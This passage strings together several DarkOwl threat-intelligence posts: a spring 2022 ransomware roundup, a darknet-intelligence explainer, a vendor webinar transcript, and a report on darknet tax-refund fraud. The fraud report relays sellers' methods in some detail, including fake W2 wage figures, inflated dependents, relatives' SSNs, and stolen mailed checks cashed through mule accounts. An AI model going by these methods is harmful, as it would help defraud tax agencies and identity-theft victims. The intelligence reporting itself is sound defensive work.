DarkOwl also observed an increase in manufacturing and construction-related companies with downstream victims including international lumber and steel processing companies mentioned quite frequently.
CONTI announced last week they successfully encrypted US-based MACK Defense, LLC, a major parts supplier and sales organization attached to the MACK trucking company. This will likely cause further interruptions to an already encumbered and fatigued US ground-based supply chain.
Meanwhile, Snatch leaked over a gigabyte of data from a popular European travel website, TUI Group.
Figure 3: CONTI Announcement of Ransoming MACK Defense, LLC
Ransomware groups have announced at least half a dozen victims across electrical, water, or natural gas-affiliated suppliers in the US, Canada, and Europe in the last 10 days.
In March, German wind-turbine supplier Nordex suffered a severe cyber incident carried out by CONTI shutting down over 5,000 wind turbines across the country. On April 23rd, CONTI leaked 145GB of exfiltrated data related to the company, archived across 82 compressed data files. The Nordex cybersecurity incident was likely a critical infrastructure retaliation attack for Germany’s support of Ukraine.
HiveLeak and AlphaV’s activity also increased significantly with nearly 100 victims between the two RaaS gangs alone. Vice Society also leaked 20 victims in the last 10 days of April after previously having a relatively slow ransomware
Figure 4: Statement from Snatch Ransomware
The Resurrection of REvil
REvil’s “Happy Blog” suddenly appeared online and operational on April 20th on the Tor network, redirecting to a new URL which announced 5 victims. The last victim posted by the REvil group was in mid-October 2021, shortly before the site began returning 404 errors and rumors emerged suggesting the FBI had seized the admin panel and deleted the Tor service using UNKN’s or another admin’s keys.
According to the BBC, members of the REvil RaaS operation were reportedly taken into custody by the Russian FSB after an international law enforcement operation last December.
The redirected URL includes a link to “Join Us” with a request for affiliates to contact them using a Tox address provided. The advertisement continues their historical 80/20 ransom split and states they have a “Тот же проверенный (но улучшенный) софт” [TRANSLATED] “The same proven (but improved) software.”
Figure 5: REvil’s Latest Call for Affiliate Partners
The new REvil Tor service boasts an odd mix of victims, including an oil and gas company in India, an asphalt production company, and a corporate signage company. By the end of the month, the service was offline and inaccessible. The intention behind revitalizing the REvil Tor service is unclear, but the timing was nearly coincident with the US closing diplomatic channels with Russia on cybersecurity.
The resurrection of REvil could indicate that President Putin has released arrested ransomware operators to carry out retaliatory attacks against critical targets in the US and Europe.
New Ransomware Groups and Patterns Emerge
A new RaaS group called Blackbasta appeared online and announced 11 new victims on the 26th of April. Blackbasta uses the ChaCha20 and RSA-4096 ciphers, an upgrade from groups like Maze and Sekhmet that utilized ChaCha20 and RSA-2048. They also call their Tor victims page “Basta News,” playing off the CONTI marketing strategy.
Figure 6: Blackbasta Tor Service “Basta News” 30 April, 2022
Another new group, Onyx ransomware, started leaking their victim data on a Tor service titled “Onyx News,” with 7 new victims added at the end of April. The victims appear to be primarily small businesses and organizations, including a local US police office and a couple of family medical practices.
The x001xs ransomware group appears to have pivoted to a different underground industry with no victims announced since late January. Their Tor service also now redirects to a darknet credit card provider called “BitCarder.”
RaaS group activity across the whole industry has steadily increased over the last 10 days. When visualizing the various groups’ victim announcements as a function of post-date, they demonstrate quite noticeable “peaks and valleys” that suggest less publishing collectively occurs on weekends.
The outlier for this trend is CL0P who drops several groupings of victim announcements only around the weekends. The CL0P group was much less active in March with announcements only at the beginning and end of the month.
Figure 7: Daily Distribution of Total Victims Per Day Across All Groups, with 3pt Moving Average Filter
Ransoming Russia
Since the end of March, an Anonymous-linked, pro-Ukrainian cyber threat cell known as Network Battalion ’65 (or simply nb65) has carried out cyberattacks against Russian entities using ransomware. The group alleges they are deploying a variation of the leaked CONTI ransomware source code, which surfaced shortly after the invasion. We have identified and downloaded at least half a dozen data leaks provided by the nb65 group that accompanied the group’s announcement of the CONTI code use.
Figure 8: nb65 Announces Use of CONTI ransomware Against JSC Bank of Russia
Hackers Hacking Hackers
On 20 March, Arvin Club published a data leak associated with the pro-Russian aligned STORMOUS ransomware gang. Arvin claimed the group poorly configured their ‘new’ Tor service after mirroring their Telegram content to the anonymous network. It was unclear whether this was motivated by malice or geopolitical alliances.
In early March, STORMOUS posted an official statement to their Telegram channel stating they did not intend to attack Ukraine but could not sit back and watch attacks against the country [Russia] that “means so much to us.” They also included CONTI’s logo and the handshake emoji with their respective hashtags, symbolizing some level of partnership.
Figure 9: Arvin Club Leak of STORMOUS Info on Tor | STORMOUS World Announcement
In the last month, Russian ransomware groups and threat actors have been actively targeting pro-Ukrainian cybersecurity researchers and Anonymous-linked cyber cells. Many researchers have been doxed and threatened across social media and Telegram in vendetta-like attacks.
Figure 10: Twitter Post Warning Anons that Russian Ransomware Gangs are Targeting the Anonymous Collective
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
The darknet (or “dark web”) is a thriving ecosystem within the global internet infrastructure that many organizations struggle to incorporate into their security posture, but it is becoming an increasingly vital component. In certain cases, that is because taking raw data and turning it into actionable security intelligence requires leveraging DARKINT – data points sourced from the darknet and other OSINT sources that together form a risk and/or investigative portfolio.
Darknet 101
The darknet is a layer of the internet that was designed specifically for anonymity. It is more difficult to access than the surface web and is accessible only via special tools and software – specifically browsers and other protocols. You cannot access the darknet by simply typing a dark web address into your web browser. There are also darknet-adjacent networks, such as instant messaging platforms like Telegram, the deep web, and some high-risk surface websites.
Quick Definitions:
darknet: Also referred to as the “dark web.” A layer of the internet that cannot be accessed by traditional browsers, but requires anonymous proxy networks or infrastructure for access. Tor is the most common.
deep web: Online content that is not indexed by search engines, such as authentication-protected sites and paste sites; it can best be described as any content on a surface web site that requires authentication.
high-risk surface web: consists of areas of the surface web (or “regular” internet) that have a high degree of overlap with the darknet community. This includes some chan-type imageboards, paste sites, and other select forums.
For a full list of darknet terms, check out our Glossary.
What is Darknet Intelligence (DARKINT)?
DARKINT™ is a term, trademarked by DarkOwl, that combines two concepts: darknet and intelligence.
The darknet, also referred to as the dark web, is a segment of the Internet, hidden from the novice user, that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit goods and services trade.
Data scientists define intelligence as a continuum of increasing data complexity. At the foundation of the pyramid is “raw data.” In statistics, raw data refers to data that has been collected directly from a primary source and has not been processed in any way. (Source)
Assembled collections of raw, unverified data across multiple sources with context forms the basis of “information.”
Intelligence is the consequence of combining analyzed, interpreted, and validated information with informed perceptions and personal experience to drive decisions.
Some key features of intelligence:
Intelligence is created and shaped by humans. Machines can compile information but cannot produce intelligence.
Intelligence is based on multiple, trusted and verified sources.
Data intelligence is also sometimes referred to as ‘insights.’
Intelligence utilized by national security or geopolitical decision makers is often accompanied by a numerical confidence value, calculated using the history, veracity, and perceptions of the information available.
DARKINT™ is intelligence derived from pure darknet, deep web, and associated adjacent underground cyber information sources.
Darknet Intelligence and DARKINT™
DarkOwl’s product suite facilitates the formation of actionable DARKINT because its Vision platform collates darknet data from multiple sources including the deep web, high-risk surface web, and darknet-adjacent networks, such as instant messaging platforms like Telegram and IRC.
In the framework of underground criminal activity and darknet(s), the continuum of data, information, and intelligence follows the example:
a sample of raw data could be a leaked credential for ABC software company;
information consists of a document in DarkOwl Vision collected from a darknet forum where a threat actor shares a database containing the leaked credentials from ABC software company in conjunction with a known vulnerability against Microsoft Exchange server;
a security analyst receives an alert of this document and analyzes this information to find the threat actor’s social media account touting they will carry out a ‘special’ cyber-attack next weekend, coupled with a scan of the software company’s network indicating they haven’t installed multi-factor authentication on their employee accounts. Using this analysis and their intuition, the analyst produces a security risk intelligence assessment stating they believe with high confidence the threat actor is very likely to attack ABC software company as early as next weekend and alerts ABC’s IT department to deploy multi-factor authentication and immediately patch all potential points of network entry.
The information in DarkOwl Vision, combined with open-source intelligence (OSINT) resources such as social media, port scanning, and network data, facilitates comprehensive business decisions across a diverse set of use cases: threat intelligence, fraud detection and mitigation, cyber insurance, supply chain and vendor risks, digital identity protection, national security, critical infrastructure protection, and law enforcement investigations.
Common Types of Raw Data & Information Circulated on the Darknet
Personally Identifiable Information (PII)
Personally Identifiable Information, or PII, is any information used to identify an individual. This type of data is incredibly valuable on the darknet, especially when combined with credential information. Examples include full name, billing address with the zip code, date of birth, email address, passport numbers, national identification numbers, and phone numbers. It also includes anything associated with one’s online presence such as a social media profile. Even information like a leaked mobile phone number can be leveraged by threat actors for social engineering activities like SIM swapping, which is used by criminals to bypass multi-factor authentication and gain unauthorized access to online accounts.
Banking and Transaction Data
Debit and credit card numbers are a common type of raw data available on the darknet. Some criminals specialize in trading the cardholder’s sensitive PII together with the associated details for debit and credit card numbers, e.g. CVV, expiration date, and personal PIN code. Criminals use card numbers to make fraudulent purchases online and deliver them to a different address, make a series of low-cost purchases the victim won’t notice, or buy expensive goods in person.
There are numerous forums and marketplaces specializing in banking, carding, and financial fraud on the darknet and in DarkOwl Vision.
Critical Corporate Data
Critical corporate data consists of mentions of company names, domain names, IP addresses and other corporate identifying markers on the darknet. Sometimes raw corporate data like the domain name, subdomains, or IP addresses for a company are shared in the darknet or deep web temporary paste sites for threat actors to collaborate ahead of a concerted cyberattack against the company.
A darknet database brokerage service advertising a company’s stolen competitive intellectual property, product design schematics, and sensitive financial or contracts packages for sale is information, not intelligence.
Credentials and Compromised Accounts
Credentials are the secure information required to safely log in to network accounts: user-specific information that verifies the identity of the user attempting to access the website or service. Some credentials are also considered PII, in particular credentials that include personal names, such as usernames. Email addresses and passwords are the most common type of credentials. More sophisticated credentials include PGP keys, AWS/Azure developer secret keys, and security tokens. Credentials can also include user-verification and digital identity authentication tools.
Malware, Exploit Toolkits, and Ransomware
Malware is malicious software with harmful code designed to break into, infect, steal, surveil, compromise, or crash networked devices. It is used to get what a criminal wants from a target without their consent. There are many categories of malware like viruses, spyware, keyloggers, and ransomware.
Several types of malware, exploit toolkits, and ransomware are available for purchase on the darknet. High-quality malware has detection-evasion capabilities to bypass network security systems and will establish persistence, meaning it stays undetected and continues giving the cybercriminal access to the information on the compromised device for months or years.
Information consists of feeds and documents in DarkOwl Vision detailing the advertisements for such malware on offer or a ransomware Tor service publishing the identities of their victims along with the extorted sensitive corporate data and PII stolen from the victim.
Malware development and exploitation attack techniques are also openly discussed in darknet forums collected by DarkOwl Vision.
Example Darknet Sources Containing High-Consequence Information
Threat Actor Chatter from Instant Messaging Platforms
Conversations (also known as “chatter”) directly from and associated with threat actors and their associated criminal communities on instant messaging platforms are an important aspect of information gathering to develop intelligence assessments based on DARKINT.
Internet Relay Chat (IRC) has been a historical, real-time chat environment for threat actors to plan, collaborate, and securely distribute stolen information related to cybercrime. Modern chat platforms like Telegram are an increasingly popular, high-frequency source of substantial darknet-adjacent information, despite not being directly connected to the darknet. These types of instant messaging platforms are widely utilized by threat actors, who administer both public and private servers and channels.
Chatter from instant messaging platforms, coupled with darknet forum posts and OSINT, aids in the translation of information into actionable, high-confidence DARKINT judgements.
Nation State Actors and Political Activity
Darknet intelligence concerning nation state actors and political activity is becoming increasingly relevant. Nation-states are typically on the darknet for intelligence gathering and espionage, campaigns to disrupt critical infrastructure of other nation-states, activism and propaganda, sharing and testing source code, exploits, and vulnerabilities, and for financial gain. Disinformation and misinformation are powerful tools some nation-states use to sway public perception and opinion.
In just the last 90 days, Telegram has featured as a critical network for 24/7 disinformation campaigns and information operations spearheaded and sponsored by the governments of Russia and Ukraine. Channels regularly include interviews with prisoners of war (POWs), digitally altered videos to trigger false-flag operations or claim kinetic military success against critical infrastructure, and leaked data disseminated from successful cyber operations.
Conclusions
DARKINT is the byproduct of combining human-powered analysis of validated data derived from darknet sources with informed perceptions and personal experiences.
By actively monitoring for raw data points such as sensitive PII, compiled information advertised and discussed on forums and marketplaces, along with darknet-adjacent chatter and associated OSINT signals, one can create concrete DARKINT and quickly deploy remediation or defense mechanisms accordingly.
DARKINT is most effective when applied to drive complex decisions like quantifying supply chain and vendor risk, underwriting cyber insurance policies, fraud mitigation and digital identity protection efforts, or creating qualified, actionable threat intelligence products in matters of national security, critical infrastructure protection or law enforcement investigations.
DarkOwl’s Vision-derived DARKINT helps international governments, local law enforcement, individuals, and companies create a more comprehensive security posture.
Learn how DarkOwl’s darknet intelligence platform plays a critical role in how Blackpanda supports customers in bouncing back from an attack, providing robust darknet data to fully understand customers’ risk profiles and assess threats. Plus, dive into a case study and see the platform in action.
For those that would rather read the conversation between CEO of DarkOwl, Mark Turnage, and Director of Strategic Development at Blackpanda, Mika D., we have transcribed the presentation below.
NOTE: Some content has been edited for clarity.
Mika (Blackpanda): Thank you, everyone, for coming to this Blackpanda, DarkOwl information session. Very excited to be partnered with DarkOwl, Blackpanda being an incident response firm. We’re going to get into more of that. Today we really wanted to present the value to end users, customers, large companies, and organizations of this partnership that we’ve developed. So with that, we’ll jump into some introductions. Mark is the CEO and founder of DarkOwl with a very, very long list of credentials and much experience, I will hand it over to him to do a bit of introduction.
Mark (DarkOwl): Great, thank you for having us, Mika, and delighted to be here. My background is as an entrepreneur in the security space. All the companies that I’ve run have been security related companies, most recently DarkOwl, which we founded five years ago. My co-founder and I are very pleased to be here and looking forward to this conversation.
Mika: Great, thank you, Mark. I’m representing Blackpanda, Director of Strategic Development. I was also the founding incident response member of the Blackpanda Group that’s based out of Singapore and Hong Kong. We address special risks from incident response malware, business email compromise, different kinds of cyber attacks all the way down the cycle to cyber insurance. So, risk transfer and mitigation ahead of time to try to prepare the environment in the event that something happens. My background is primarily in national security and a full range of cybersecurity services, products, and a little bit of time in the intelligence community. So excited to jump into this webinar and give you a better idea of how our incident response services and deep web threat intel work together a bit on the cyber incident response side of the house. We hyper focus on digital forensics, the investigation, and cyber crimes, and we are stationed in different cities across Southeast Asia so that we have a local presence in all of these markets if and when an incident occurs.
A bit about the incident response lifecycle because it’s confusing what happens exactly when an organization is hacked and how does that move forward? How do we work with our partners, especially when something happens?
Essentially, incident response starts with a call, an alert or an automated indicator that comes from one of our intelligence platforms, be it DarkOwl or an endpoint detection and response tool or our own proprietary software. Once we receive that alert or notification, we will then determine the validity and extent of the attack. So it’s kind of like scoping out what happened and what resources do we need to deploy in order to address it? We prepare the team and we proceed to a triage process where we’re gathering evidence. We’re looking for indicators of compromise, we’re collecting a plan of action, and we work with the client in order to basically stop the infection from spreading any further. Then we move into the containment phase. Within the first 48 hours, we’ve figured out roughly what’s going on, who is the threat actor, and question what assets could be at risk and what data is at risk.
The customer always wants to know, has data been leaked? What kinds of emails or passwords or proprietary files might be out and be in the dark web? And at that point, we will then turn to some of our partners, such as DarkOwl, in order to enhance that information. So, as we’re containing the malware, we’re also providing the suite of the environment to look for extended attacks. This could be second stage payloads, which would be if the attacker first gets in and spreads more malware, or they’re looking to steal credentials or steal certain files. So, we’re really examining both inside the organization as well as from outside what might have left the organization.
And then, finally, once everything’s been contained, we feel comfortable that the organization can get back online, we prepare a report and present lessons learned. We also try to assemble any and all information that could have been leaked because that’s where regulation and compliance comes into play. So that’s essentially the incident response lifecycle and is one of Blackpanda’s areas of expertise.
Now onto DarkOwl.
Mark: Thank you, Mika. And as Mika mentioned, we are involved in both the frontend and the backend of the incident response cycle with Blackpanda. Just a bit about DarkOwl and what we do. DarkOwl has built a platform that actively and continuously monitors the darknets, many darknets, and makes that data searchable by our clients. Among the darknets that we monitor are Tor, I2P, ZeroNet, a range of other darknets. And I should say, that we call it the darknet, because in most of these forums and most of these darknets, user identity is obfuscated and traffic is encrypted. So, it’s a very difficult environment to monitor, and we have built a platform that does that across 25 to 30,000 darknet sites a day and it archives that data so that not only will you look and see what was happening today and on a continuous go forward basis, but you also have an archive to see what has happened in the past. You’ll see some of the numbers of records that we have available in our database today.
Records available in DarkOwl database as of April, 2022
Just to talk a little bit about what is in the darknet, why is it important for both an incident response team and then more broadly. Among the types of data that are found in the darknet are very large quantities of personally identifiable information, credentials, compromised accounts, malware, ransomware. There’s a lot of chatter among a variety of different forums between threat actors. There are lots of vendor and supply risk indicators as well. Most recently, in the context of the Ukraine Russia war, we are finding significant indicators of risk among vendors, supply chain vendors and supply chains that have presence in Ukraine, Belarus, and Russia. A lot of that chatter, a lot of those indicators show up in the darknet and in our platform. A lot of our platform is very intuitive to use. We can deliver data a number of ways. What you’re looking at here is our Vision platform search UI.
Screenshot of DarkOwl Vision UI platform
And actually, later in this webinar, I’ll do a quick tour. But you can see from looking at the top of this, it’s a very simple search bar. We can look for whatever you’re looking for in the darknet, at any given time. You can see there’s a search loaded on this slide for Conti, one of the threat actors out of Russia, and there are 52,000 results. We see 52,000 pages in the darknet at the time this search was run talking about Conti or mentioning Conti, or where Conti is participating in it in a forum. So, it’s a comprehensive platform to monitor the darknet and in the context of an incident response team, it can both alert you to a breach or to an incident and then it can provide you with the intelligence, as Mika said, to assess that breach and then really remediate it.
Mika: And I was just going to jump in exactly on that point. We’ve dealt with several Conti breaches, and once we see indicators that that might be the malware in use the threat actor in use, not only are we on the hard drive examining the forensic artifacts of the system to pull out what time they got in, what they’ve taken and basically any signs of lateral movement or their actions on objectives, we’re also coming over here and plugging in the exact threat actors names. They have handles, they have email addresses, they have IP addresses, so whatever we find in the environment, this search platform is kind of where we go to see what’s happening on the outside as opposed to just on the inside of the organization across the systems.
Mark: And connecting those dots is critical. If you don’t connect those dots, you’re only looking at one particular piece of relevant information. And we are delighted to be able to offer that level of intelligence to teams like your own.
Mika: Absolutely, and sometimes the crawl date will show a date that much precedes the actual incident. So, the event might have happened even before, and that also helps our forensics because it gives us pivot points in time so we might go back further to the first sign of chatter on a certain target.
Well, I guess this comes back around to how we work together. The reconnaissance phase is what we just mentioned, where a threat actor is mentioning a potential target; the threat actor has scoped out where they’re looking to go and what they’re looking to do, actions on objectives. During that reconnaissance phase, we might see chatter in the dark web. The cyber kill chain is a Lockheed Martin concept that helps explain the chronology of an attack. So, they’re scoping out the target, they’re preparing an exploit that could be used against a vulnerability at the organization, and then delivery, exploitation, installation is typically where the customer would pick up on the fact that something is happening. Command and Control is quite noisy and usually limited to just forensics and network analysis. But that’s where they are continuing to operate within the environment, using remote access to the organization. And, like we said, actions on objectives. This is where data is leaked or sold on the dark web. This is where they’re actually putting ransomware across systems and trying to extort the organization. All of this can either be incident response based, so in the event of an attack, or a proactive service called compromise assessments, which is where we would continuously perform these darknet searches with DarkOwl and we would have software on the endpoints that allows us to perform advanced threat hunting. So, anything we’re seeing, like Mark said, there’s chatter and there’s also indicators across the internet of potential events that could be happening. We can sweep the environment and look for signs of that before something actually happens. So even though antivirus and anti-malware work just some percent of the time, there are advanced threats that don’t yet have signatures that nobody’s tracking yet across the board, and these advanced threat hunting skills and darknet searches allow us to find signs of that much earlier.
We can jump into a case study a little bit before Mark demos. But essentially, Blackpanda had a great success tracing down data leaks following a case in Southeast Asia. We were tasked to discover, analyze, and report stolen or misappropriated data related to client domains or keywords. This essentially means they thought they might have been breached. They hadn’t yet signed on for a compromise assessment, which is basically like a sanity check: is there something going on? My antivirus didn’t check, and they came to us with the suspicion that something had happened. Over the course of this project, partnering with DarkOwl, and performing very targeted searches for their keywords, we then pivoted to compare how this attack was similar to other found threat actor groups and different sites in the deep web that held their records. After about two months, we had 13,500,000 records related to this one company. That allowed them to report and take precautions, and follow-on measures to contain the attack and also try to remediate the damage of that data leak. It was very important for them to know the extent and just how much data was actually released. And then we walked them through how to actually patch and repair the systems that led to that attack. So, what happens? How do we find 13,000,000-some records, Mark?
Mark: Well, that’s a very good question, and we’ll show you a couple of searches to show you how we do that. It is not unusual for sizable companies to have that level of exposure in the darknet. They are usually the result of multiple leaks, multiple breaches that have occurred over the years. The risk, by the way, to this company and to other companies is that a substantial portion or even a small portion of those records are still alive. So many people will remember the Colonial Pipeline breach that occurred last summer here in the United States, which shut down the gasoline supply to a large portion of the east coast for about a week. It has been publicly reported that the way the hackers got into the Colonial Pipeline network was, in fact, via a credential that had been formerly used by an intern that was available widely in the darknet. In other words, there was no phishing that occurred. They just went into the darknet, pulled down a credential, discovered that it was live and walked right into the Colonial Pipeline network. That is one of the risks that occurs. That’s exactly where Blackpanda can add significant value to any client.
Mika: Excellent. So we’ve already been through this kind of wave as to how we could either proactively identify those leaked credentials after a compromise assessment and prevent a lot of these from happening. There’s also the incident response where we get indicators and intelligence that we need to enrich and also check externally whether there’s any additional signs. So these are just more kind of snapshots of how this could work proactively. But, you know, in our reporting, we’re very thorough; this is sort of inside the organization. We’ve deployed a certain endpoint detection and response tool where we’re looking for signs of malware, signs of threats. These are all technical threats that would only be available given a view into the organization. These are all the kinds, the strains, of malware and hash values that might be in a report. And again, signs of these things can also be thrown into DarkOwl, or a platform that helps us enrich that intelligence. So what else do we know about a file with this hash value? The hash is the unique signature of a single piece of digital information. Whether it’s a single document or a giant binary file, everything can be hashed to a unique value. So these are great ways to leverage DarkOwl as well. Has anyone else been talking about or posting about malware by this name or with this hash value? Are these websites places that this backdoor Trojan might be still sitting? Has anyone else talked about these particular indicators of compromise, IOCs, across the deep web? So these are just a few of the ways that we would really get into DarkOwl and use it not only during an investigation, but proactively as well.
Mark: One of the strengths of the DarkOwl platform is that any of these terms can be inserted in and searched for on the platform. It’s a search tool. It has a fundamental search capability. And as Mika said, we can then identify the threat actors who are discussing it, whether there are future targets, whether there were discussions in the past about targeting this particular client’s environment. It’s a wealth of information that opens up once you have the ability to search across the entire dark web for any of these terms or any of these hash values.
Mika: Absolutely, and that’s exactly how we enrich our intelligence and report on what really happened and what could be happening even outside the organization. With that again, DarkOwl traces and brings into their intelligence ecosystem a number of different breaches. So although this was particular to a certain client, you know, these breaches hold passwords of thousands and millions of users. They could be huge. They could be massive databases that are even sometimes an amalgamation of different breaches over time. So DarkOwl keeps us current on what else is happening. And with that, again, we’ve kind of been over the flow in a sense, but we extract indicators of compromise from the evidence we received by going through the forensic intake and triage process. Then we enrich across dark web intelligence sources and perform forensic analysis on the actual system itself. So getting timestamps, trying to bring it back to the root cause. So when did this happen? Why did this happen? And then our reporting can be very robust as a result of us having this level of intelligence. So I guess it’s time to see it in action.
Mark: Well, thank you. If you could let me share my screen, I will switch over. What you see in front of you is the landing page for DarkOwl Vision, our user interface. It’s quite intuitive. There’s a search bar and you can search for any term. As mentioned, they can be hash terms, they can be nicknames, they can be user handles, they can be combinations of all of the above. I’m going to do a quick search and I’m going to pick on AT&T for no good reason. I apologize if anyone from AT&T is going to see this. I’m going to do a search for AT&T .com, and I am going to search for any mentions of AT&T .com in the darknet, meaning any page that has a credential or mention of the AT&T .com domain on it. And as you can see, there are almost half a million pages in our database in the darknet mentioning AT&T .com. The results are presented here. If you scroll down, you’ll notice that M.J. Matthews of AT&T .com has, as mentioned, a range of email addresses that are mentioned here, and the results can be sorted and presented in a number of different ways. If I sort these results, these half million results, by crawl date, for example (and there are a lot of results, so this will take a second), you’ll see that the most recent of these results was extracted from the darknet about an hour and a half ago. So this is a very recent result, and I can then sort them by relevance and hackishness, which is a term we use to determine how dangerous those results are. So, for example, I won’t click on it, but down here, my guess is this is 100 percent hackishness because there’s a password associated with that particular domain. So it’s very intuitive, it’s very easy to use. As Mika mentioned, a team that is looking for a specific term or an actor in the darknet can very easily and very intuitively jump onto this platform and see what’s happening and then say, what were they doing most recently? And you can sort by crawl date.
I want to show one other feature that is relevant to what Mika has been talking about, which is our dark and exposure scores. I can create a score for any domain, any domain in the world, and I’ve just randomly selected one. You can see there’s even a dark score here if I click on this AT&T score. This is a score of how exposed AT&T, since I just did the search, is in the darknet, and you’ll see the score changes, and you’ll see as I move my cursor, the score changes in proportion to how much data is available in the darknet at any given point in time around AT&T. And I’ll take the example of BlackBerry here. BlackBerry on the 14th of May of last year had a score just above 10, and overnight their score jumped to just under 14. That’s a massive jump in our scoring metric and in our scoring algorithm. And the reason is somebody released a bunch of data around BlackBerry. In fact, a terrific amount of data around BlackBerry. If you’re a user of the platform or a partner like Blackpanda, this is an indicator that something’s gone wrong. There has been a major compromise. We need to investigate this very quickly. So this provides a very quick back-of-the-envelope way to monitor clients, to monitor your own environment, to see what’s going on and to compare how you are doing relative to, say, your competitors or other people who are in your sector. The platform comes with a range of other ways that you could pass data, search data, and make use of data, including an alerting platform, so that if, for example, AT&T is a client or you are AT&T and you’re monitoring your own environment, you can be alerted by email to any critical elements that show up in the darknet at any given time. So that’s a very quick demo, Mika, and thank you for allowing me to do that. But you can see it’s a very intuitive platform. It has direct usage in the incident response phase, and we’re delighted, as I said earlier, to partner with Blackpanda.
Mika: I think that’s our last topic. Just on that again, it’s been very powerful for us to be able to show again, for every organization that’s been hacked, it’s the worst day. It’s a terrible event. But in the event that we get those early indicators and we’re able to stop something before something even worse happens, you know, at the sign of chatter or proactively by finding initial indicators of an intrusion and correlating that with deep web intelligence and then stopping this thing before it happens, it’s just a very powerful solution. So we’ve been thrilled to partner with DarkOwl. And if there are any questions after the webinar, by all means, we’ll provide contact details in posting this recording.
DarkOwl has evidence that criminals from the darknet are actively exploiting the American Treasury Department and its Internal Revenue Service (IRS). Many actors are advertising offers for ‘refund methods’ for sale in fraud communities across the darknet and adjacent chat platforms such as Telegram. Fraudsters have also detailed how to directly utilize tax preparation software such as TurboTax to steal refunds for quick, but fraudulent, financial gain.
Other underground fraud methods, such as ‘glass checks,’ are increasingly popular. DarkOwl has observed that several victims’ tax payment checks to the IRS and/or state revenue departments have been stolen and sold on the darknet for financial exploitation.
One of the primary financial economies of the darknet is fraud, and tax fraud is a booming sub-economy that is constantly evolving. Our analysts have provided the below as the result of our latest observations in regards to tax fraud on the darknet.
Fraud on the Darknet
The brokerage of corporate and private information is one aspect of fraud we see realized in leak after leak of corporations’ and consumers’ private information. However, the fraud industry is much larger than data alone. This ever-growing segment of the darknet encapsulates not only the carding industry and associated banking malware and exploit development, but also what we casually refer to as the ‘get-rich-quick’ schemes that prey on loopholes in payment interfaces and programs.
During the pandemic, we observed an influx of new ‘get-rich-quick’ fraudsters entering the darknet, capitalizing on vulnerabilities in the US government subsidized funding programs for those financially impacted by COVID-19. We also witnessed programs such as the Small Business Administration (SBA)’s Paycheck Payment Program (PPP) and state-level Pandemic Unemployment Assistance (PUA) regularly mentioned across Telegram with regular ‘sauce’ offers and updates available. We detailed how some of these programs were exploited in our in-depth report last year.
According to public media sources and recent academic reporting, it is estimated that the US paid out at least 10-15% of the $800 billion USD PPP in fraudulent payments. PUA fraud estimates are closer to $400 billion USD.
Many of the same fraudsters who buy, trade, and sell methods for pandemic-related financial fraud schemes also advocate and disseminate tax refund fraud methods in the underground.
Current Tax Fraud Mentions
Most of the IRS fraud methods on Telegram include offers for “fullz” for the IRS tax refund walk-through method. “Fullz” is darknet community slang for ‘full information’ and usually includes an individual’s full name, social security number (SSN), date of birth, physical address, credit card number, and other key identification information used to conduct identity theft.
According to DarkOwl Vision, the price of ‘fullz’ has decreased in recent years with US citizen ‘fullz’ readily available for less than $20 USD. More expensive ‘fullz’ will also include a copy of the victim’s driver’s license or falsified bank statements for additional identity verification.
In addition to individual ‘fullz’, some underground data brokers sell ‘access’ to drives and databases with significant volumes of PII. A couple of years ago, a RaidForums member using the moniker “fairbanksfires” advertised an offer to purchase access to stolen devices associated with an online tax filing company in the United States.
This cybercriminal could provide a buyer access to millions of US social security numbers, email addresses, passwords, and bank routing and account numbers for extensive tax fraud for years to come.
The most common ‘irs method’ and tax refund fraud method costs no more than $150 USD. Other personalized offers for IRS tax fraud include not only the ‘fullz’, but supporting falsified self-employed business licenses and 1099 and W2 forms generated by the fraudster to supplement the IRS tax forms and increase the potential for higher refund amounts. Most methods, upon purchase, detail how to perform an OSINT background search on the ‘fullz’ information provided to locate the employer of the fullz or their previous employer.
The web service FreeERISA is often mentioned; it gives registered users free access to all Form 5500s filed with the Department of Labor for nearly all companies across the United States, including tax identification numbers. Methods further detail how to estimate tax credits and beneficiary information to submit in the return to maximize the refund amount.
One user shared a video on a Telegram channel using this method that demonstrated a fraudulently filed Federal tax return with a refund amount of more than $20,000 USD, while the California State return was close to $3,500 USD.
Source: Telegram
Another fraudster’s IRS method advises the buyer to use known persons that have little to no credit history but will pass SSN validation checks in tax account software applications. They recommend using their own children’s, elderly parents’, grandparents’ or distant familial associations’ SSNs and identities for higher success of the tax fraud method.
IRS Method using Buyer’s Identity
This method is directly tied to the buyer’s identity and SSN and involves utilizing automated tax software like TurboTax and TaxAct to obtain a refund of upwards of $20,000 USD in combined federal and state funds. The seller caveats up front that this method will eventually lead to the IRS catching on and forcing the buyer to repay the amount refunded during this tax year. The purpose of this method is to give the buyer financial relief for an estimated two to six years before an audit is highly likely.
Any W2 can be utilized for this method – or one can be obtained from the fraudster directly. The buyer does not actually have to be employed to use this method. The fraudster stated that the buyer may enter any amount in the Wages, Tips, and Compensation field of the W2, but the amount should not exceed $100,000 USD. The exact percentages for federal and state social security wages and tax withheld calculations are provided in the method as guidance for the buyer’s fraudulent W2 entries.
The fraudster suggested adding real life or ‘fullz’ dependents to increase the refund amount.
Source: Telegram
The fraudster was upfront that this method is only recommended for the worst-case buyer in extreme financial duress, e.g. has no money whatsoever, homeless, or unable to make ends meet and needs money quickly.
Competitive Fraudsters
Naturally, fraud vendors are incredibly competitive with each other and speak out against other popular fraud shops and declare that most methods are scams. DarkOwl noticed one user on Telegram berating the widely discussed ‘irs method’ avowing their method alone was the ‘real method’ and payments are readily available in 48 hours.
‘Glass Fraud’ Catches IRS Payments Mailed via USPS
A new fraud method involves the physical theft of mailed paper checks inside the US Postal System (USPS). According to fraudsters, the method is commonly called ‘glass’ because “the checks always clear,” and it often requires an insider threat, e.g. cooperative postal workers who provide copies of the universal mailbox access keys or steal the mail directly and turn it over to the fraudsters for resale.
The fraudster sells the check to the buyer for some base price or percentage of the value of the check, usually via Bitcoin or similar cryptocurrency. The stolen checks are then digitally altered and deposited into mule-controlled bank drops that pay out the specified amount of the check to the buyer via their preferred method, such as cash, Western Union, or CashApp. The buyer assumes the risk that the check will not go through, but because the victim is completely unaware their check has been stolen, it is most likely not yet cancelled. It is only when the payment never arrives at the payee’s address that they realize they are a victim of fraud.
Although this method does not directly target the IRS and tax refunds specifically, many of the stolen checks include tax payments submitted via physical checks through the US mail.
